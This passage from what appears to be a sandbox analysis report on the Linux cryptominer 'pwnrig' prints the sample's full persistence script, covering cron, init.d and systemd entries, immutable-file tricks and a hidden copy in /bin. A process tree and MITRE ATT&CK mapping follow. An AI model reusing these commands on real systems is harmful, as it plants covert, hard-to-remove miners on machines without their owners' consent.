>/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
    3⤵
    - Attempts to change immutable files
    - Writes file to tmp directory
    PID:1877
  - - /usr/bin/id
      id -u
      4⤵
      PID:1878
  - - /usr/bin/id
      id -u
      4⤵
      PID:1879
  - - /usr/bin/chattr
      chattr -i -a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:1880
  - - /usr/bin/rm
      rm -rf /bin/bprofr
      4⤵
      PID:1881
  - - /usr/bin/sed
      sed -i /bprofr/d "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:1882
  - - /usr/bin/cp
      cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/bprofr
      4⤵
      Writes file to system bin folder
      PID:1883
  - - /usr/bin/id
      id -u
      4⤵
      PID:1884
  - - /usr/bin/chattr
      chattr +i +a /bin/bprofr "~/.bash_profile"
      4⤵
      Attempts to change immutable files
      PID:1885
  - - /usr/bin/mkdir
      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
      4⤵
      PID:1886
  - - /usr/bin/chattr
      chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:1887
  - - /usr/bin/rm
      rm -rf /bin/crondr
      4⤵
      PID:1888
  - - /usr/bin/cp
      cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/crondr
      4⤵
      Writes file to system bin folder
      PID:1889
  - - /usr/bin/tee
      tee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Creates/modifies Cron job
      PID:1891
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig
      4⤵
      Attempts to change immutable files
      Creates/modifies Cron job
      PID:1892
  - - /usr/bin/chmod
      chmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      PID:1893
  - - /usr/bin/chattr
      chattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr
      4⤵
      Attempts to change immutable files
      PID:1894
  - - /usr/bin/which
      which chkconfig
      4⤵
      PID:1895
  - - /usr/bin/which
      which update-rc.d
      4⤵
      PID:1896
  - - /usr/bin/chattr
      chattr -i -a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:1897
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig disable
      4⤵
      Flushes firewall rules
      PID:1898
  - - /usr/sbin/update-rc.d
      update-rc.d -f pwnrig remove
      4⤵
      PID:1899
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1900
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1900
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1900
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        
        PID:1900
  - - /usr/bin/rm
      rm -rf /bin/initdr
      4⤵
      PID:1927
  - - /usr/bin/cp
      cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/initdr
      4⤵
      Writes file to system bin folder
      PID:1928
  - - /usr/bin/tee
      tee /etc/init.d/pwnrig
      4⤵
      Modifies init.d
      PID:1930
  - - /usr/bin/sed
      sed -i "1 s/-e //" /etc/init.d/pwnrig
      4⤵
      Attempts to change immutable files
      Modifies init.d
      PID:1931
  - - /usr/bin/chmod
      chmod +x /etc/init.d/pwnrig /bin/initdr
      4⤵
      PID:1932
  - - /usr/sbin/update-rc.d
      update-rc.d pwnrig defaults
      4⤵
      PID:1933
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1934
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1934
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1934
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        Enumerates kernel/hardware configuration
        
        PID:1934
  - - /usr/sbin/update-rc.d
      update-rc.d pwnrig enable
      4⤵
      PID:1960
    - - /usr/local/sbin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:1961
    - - /usr/local/bin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:1961
    - - /usr/sbin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        
        PID:1961
    - - /usr/bin/systemctl
        
        systemctl --quiet enable pwnrig
        5⤵
        Reads EFI boot settings
        
        PID:1961
    - - /usr/local/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1962
    - - /usr/local/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1962
    - - /usr/sbin/systemctl
        
        systemctl daemon-reload
        5⤵
        
        PID:1962
    - - /usr/bin/systemctl
        
        systemctl daemon-reload
        5⤵
        Reads EFI boot settings
        Enumerates kernel/hardware configuration
        
        PID:1962
  - - /usr/bin/chattr
      chattr +i +a /etc/init.d/pwnrig /bin/initdr
      4⤵
      Attempts to change immutable files
      PID:1988
  - - /usr/bin/which
      which systemctl
      4⤵
      PID:1989
  - - /usr/bin/chattr
      chattr -i -a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:1990
  - - /usr/bin/rm
      rm -rf /bin/sysdr
      4⤵
      PID:1991
  - - /usr/bin/cp
      cp -f -r -- /tmp/-bash-18a624c0-9026-4abf-81dd-8b579c9ce571 /bin/sysdr
      4⤵
      Writes file to system bin folder
      PID:1992
  - - /usr/bin/tee
      tee /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Modifies systemd
      PID:1994
  - - /usr/bin/sed
      sed -i "1 s/-e //" /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service
      4⤵
      Attempts to change immutable files
      PID:1995
  - - /usr/bin/chattr
      chattr +i +a /lib/systemd/system/pwnrigl.service /etc/systemd/system/pwnrige.service /bin/sysdr
      4⤵
      Attempts to change immutable files
      PID:1996
  - - /usr/bin/systemctl
      systemctl enable pwnrige.service
      4⤵
      Reads EFI boot settings
      Reads runtime system information
      PID:1997
  - - /usr/bin/systemctl
      systemctl enable pwnrigl.service
      4⤵
      Reads EFI boot settings
      PID:2023
  - - /usr/bin/systemctl
      systemctl daemon-reload
      4⤵
      Reads EFI boot settings
      PID:2049
  - - /usr/bin/systemctl
      systemctl reload-or-restart pwnrige.service
      4⤵
      Reads EFI boot settings
      Reads runtime system information
      PID:2075

/usr/bin/nohup
nohup ./dpkg-deb-package
1⤵
PID:1636

/usr/bin/dpkg-deb-package
./dpkg-deb-package
1⤵
PID:1636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

Persistence

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Privilege Escalation

Boot or Logon Autostart Execution

Hijack Execution Flow

Scheduled Task/Job

Defense Evasion

Hijack Execution Flow

Virtualization/Sandbox Evasion

Credential Access

Discovery

System Information Discovery

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Virtualization/Sandbox Evasion